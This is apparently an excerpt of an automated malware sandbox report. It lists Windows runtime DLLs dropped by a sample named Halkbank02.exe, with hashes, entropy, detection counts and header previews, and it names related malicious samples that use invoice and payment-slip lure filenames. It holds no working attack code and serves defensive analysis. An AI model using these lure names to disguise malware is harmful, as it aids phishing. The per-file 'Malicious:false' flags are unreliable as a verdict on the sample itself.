                                                                              Size (bytes):118784
                                                                              Entropy (8bit):0.4589421877427324
                                                                              Encrypted:false
                                                                              SSDEEP:48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                              MD5:16B54B80578A453C3615068532495897
                                                                              SHA1:03D021364027CDE0E7AE5008940FEB7E07CA293C
                                                                              SHA-256:75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
                                                                              SHA-512:C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
                                                                              Malicious:false
                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-console-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.080160932980843
                                                                              Encrypted:false
                                                                              SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
                                                                              MD5:502263C56F931DF8440D7FD2FA7B7C00
                                                                              SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
                                                                              SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
                                                                              SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: gunzipped.exe, Detection: malicious, Browse
                                                                              • Filename: Halkbank01.exe, Detection: malicious, Browse
                                                                              • Filename: gunzipped.exe, Detection: malicious, Browse
                                                                              • Filename: PO#55091269.exe, Detection: malicious, Browse
                                                                              • Filename: purchase invoice.exe, Detection: malicious, Browse
                                                                              • Filename: HALKBANK01.exe, Detection: malicious, Browse
                                                                              • Filename: #U00f6deme-13.09.2021.exe, Detection: malicious, Browse
                                                                              • Filename: # 310573418 nuevo orden.exe, Detection: malicious, Browse
                                                                              • Filename: Rally RadiatorsREQUEST.pdf.exe, Detection: malicious, Browse
                                                                              • Filename: F2kvZ2vpfP.exe, Detection: malicious, Browse
                                                                              • Filename: 37E292496F057CBBBA45F28B7510C8E4B555DCB2AD430.exe, Detection: malicious, Browse
                                                                              • Filename: PO 1210.exe, Detection: malicious, Browse
                                                                              • Filename: Payment slip.exe, Detection: malicious, Browse
                                                                              • Filename: bin.exe, Detection: malicious, Browse
                                                                              • Filename: Oferta de produto 74675673748.jar, Detection: malicious, Browse
                                                                              • Filename: 4098765432345678987654345678 .jar, Detection: malicious, Browse
                                                                              • Filename: 20210909161956_00023,pdf.exe, Detection: malicious, Browse
                                                                              • Filename: PO 12501.exe, Detection: malicious, Browse
                                                                              • Filename: X4lLneI8ZK.exe, Detection: malicious, Browse
                                                                              • Filename: A0J09876543234567890-0987654323456789.jar, Detection: malicious, Browse
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.093995452106596
                                                                              Encrypted:false
                                                                              SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
                                                                              MD5:CB978304B79EF53962408C611DFB20F5
                                                                              SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
                                                                              SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
                                                                              SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-debug-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.1028816880814265
                                                                              Encrypted:false
                                                                              SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
                                                                              MD5:88FF191FD8648099592ED28EE6C442A5
                                                                              SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
                                                                              SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
                                                                              SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.126358371711227
                                                                              Encrypted:false
                                                                              SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
                                                                              MD5:6D778E83F74A4C7FE4C077DC279F6867
                                                                              SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
                                                                              SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
                                                                              SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):21816
                                                                              Entropy (8bit):7.014255619395433
                                                                              Encrypted:false
                                                                              SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                                                                              MD5:94AE25C7A5497CA0BE6882A00644CA64
                                                                              SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                                                                              SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                                                                              SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l1-2-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.112057846012794
                                                                              Encrypted:false
                                                                              SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                                                                              MD5:E2F648AE40D234A3892E1455B4DBBE05
                                                                              SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                                                                              SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                                                                              SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-file-l2-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.166618249693435
                                                                              Encrypted:false
                                                                              SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                                                                              MD5:E479444BDD4AE4577FD32314A68F5D28
                                                                              SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                                                                              SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                                                                              SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-handle-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.1117101479630005
                                                                              Encrypted:false
                                                                              SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                                                                              MD5:6DB54065B33861967B491DD1C8FD8595
                                                                              SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                                                                              SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                                                                              SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-heap-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.174986589968396
                                                                              Encrypted:false
                                                                              SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                                                                              MD5:2EA3901D7B50BF6071EC8732371B821C
                                                                              SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                                                                              SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                                                                              SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-interlocked-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):17856
                                                                              Entropy (8bit):7.076803035880586
                                                                              Encrypted:false
                                                                              SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                                                                              MD5:D97A1CB141C6806F0101A5ED2673A63D
                                                                              SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                                                                              SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                                                                              SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.131154779640255
                                                                              Encrypted:false
                                                                              SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                                                                              MD5:D0873E21721D04E20B6FFB038ACCF2F1
                                                                              SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                                                                              SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                                                                              SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-localization-l1-2-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):20792
                                                                              Entropy (8bit):7.089032314841867
                                                                              Encrypted:false
                                                                              SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                                                                              MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                                                                              SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                                                                              SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                                                                              SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-memory-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18744
                                                                              Entropy (8bit):7.101895292899441
                                                                              Encrypted:false
                                                                              SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                              MD5:D500D9E24F33933956DF0E26F087FD91
                                                                              SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                              SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                              SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):18232
                                                                              Entropy (8bit):7.16337963516533
                                                                              Encrypted:false
                                                                              SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                              MD5:6F6796D1278670CCE6E2D85199623E27
                                                                              SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                              SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                              SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19248
                                                                              Entropy (8bit):7.073730829887072
                                                                              Encrypted:false
                                                                              SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                              MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                              SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                              SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                              SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                              Malicious:false
                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                                                                              C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-processthreads-l1-1-0.dll
                                                                              Process:C:\Users\user\Desktop\Halkbank02.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):19392
                                                                              Entropy (8bit):7.082421046253008
                                                                              Encrypted:false
                                                                              SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                              MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                              SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                              SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                              SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                              Malicious:false
